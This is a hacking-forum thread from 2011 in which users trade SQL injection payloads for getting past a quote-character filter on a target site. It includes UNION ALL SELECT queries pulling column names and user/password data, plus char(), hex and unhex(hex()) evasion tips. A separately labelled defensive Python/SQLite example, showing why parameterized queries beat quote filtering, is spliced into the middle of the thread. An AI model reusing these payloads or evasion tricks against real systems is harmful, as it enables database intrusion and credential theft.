Author

SQLi with character filters - how to


Member

Rank:
Guest
Posted on 15-07-11 21:58
Hey guys. How do I proceed with SQLi when there seems to be some sort of character filter?

Whenever I use ', for example, I get an error. That becomes an issue when I try something like:

UNION ALL SELECT 1,2,column_name,4 FROM information_schema.columns WHERE table_name='table'--

I've tried using things like table_name=CHR(39)||table||CHR(39) with no success.

Any ideas? :ninja:

Edited by rex_mundi on 11-12-13 13:39
Author

RE: SQLi with character filters - how to?

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 15-07-11 23:15
It's char(12,34,45,56).

Not sure if chr() is a valid command. If you run into filters, try to replicate them and test locally.



"The chowner of property." - Zeph
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
http://bitsofspy.net
Author

RE: SQLi with character filters - how to?


Member

Rank:
Guest
Posted on 15-07-11 23:28
http://wocares.com/noquote.php
Author

RE: SQLi with character filters - how to?

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 15-07-11 23:51
http://hackvertor.co.uk
Author

RE: SQLi with character filters - how to?


Member

Rank:
Guest
Posted on 16-07-11 01:00
Thanks for the tips, guys, but still no results.

I tried these inputs:

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(0x27,users,0x27)--

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)usersCHAR(39)--

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)||users||CHAR(39)--

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(CHAR(39),users,CHAR(39))--

I've also tried substituting ='users' and 'users' for CHAR(xxx). No cigar.

It is strange that the first one doesn't work, because if I try something like:

union all select null,null,CONCAT(users,0x27,pass),null,null,null,null,null from users--

it works... so it shouldn't be a problem with CONCAT.

Any more ideas?

Edited by on 16-07-11 01:01
Author

RE: SQLi with character filters - how to?

Tucak
Member

Posts: 19
Location:
Joined: 04.06.08
Rank:
Newbie
Posted on 16-07-11 09:18
It should be something like WHERE table_name=char(1,2,3,4)
Author

RE: unhex(hex())


Member

Rank:
Guest
Posted on 22-07-11 08:48
Have you tried the unhex(hex()) method - that always seems to work for me.

And it's also worth adding a \ character before your single quotes to see if they're still using addslashes or something equally pathetic.
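
Added example, not part of the thread or any poster's code: the replies above note that a string can be written without a quote character (char(...), hex literals), which is why a quote filter or addslashes does not fix the underlying query. The Python sketch below uses a constructed in-memory SQLite table and hypothetical helper names (quote_filter, notes_filtered, notes_bound) to put the filtered-but-concatenated query next to the parameterized one.

```python
import sqlite3

# Constructed quote-free input: char(98,111,98) evaluates to the string 'bob'.
QUOTE_FREE = "0 OR owner=char(98,111,98)"

def make_db():
    # Constructed sample data, in memory only.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, owner TEXT, body TEXT)")
    conn.executemany("INSERT INTO notes VALUES (?, ?, ?)",
                     [(1, "alice", "public note"), (2, "bob", "private note")])
    return conn

def quote_filter(value):
    # Hypothetical filter of the kind the thread describes: reject quotes.
    if "'" in value or '"' in value:
        raise ValueError("quote character rejected")
    return value

def notes_filtered(conn, note_id):
    # Weak: the filtered text is still spliced into the statement, so the
    # database parses it as SQL rather than as a value.
    sql = "SELECT body FROM notes WHERE id = " + quote_filter(note_id)
    return [row[0] for row in conn.execute(sql)]

def notes_bound(conn, note_id):
    # Hardened: the value is sent as a bound parameter and only ever
    # compared against id; it cannot add conditions to the statement.
    sql = "SELECT body FROM notes WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (note_id,))]

def compare(note_id):
    # Run one input through both query styles on a fresh database.
    conn = make_db()
    try:
        filtered = notes_filtered(conn, note_id)
    except ValueError as exc:
        filtered = "blocked: " + str(exc)
    return {"filtered": filtered, "bound": notes_bound(conn, note_id)}

if __name__ == "__main__":
    for candidate in ("1", "0 OR owner='bob'", QUOTE_FREE):
        print(repr(candidate), compare(candidate))
```

The quoted input is stopped by the filter, the quote-free one is not, and only the bound query returns nothing for both.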


Author

RE: SQLi with character filters - how to?

gr00ve_hacker
Member



Posts: 3
Location: Your 127.0.0.1
Joined: 13.01.11
Rank:
Guest
Posted on 28-10-11 17:07
You might want to have a look here:

http://www.youtube.com/watch?v=EWQoAoJix2I


http://gr00ve-hack3r.com

Hacking articles, videos, Downloads and much more
www.gr00ve-hack3r.com